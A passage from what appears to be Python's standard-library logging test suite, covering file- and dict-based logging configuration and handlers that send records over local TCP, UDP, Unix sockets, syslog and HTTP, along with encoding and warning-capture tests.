self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
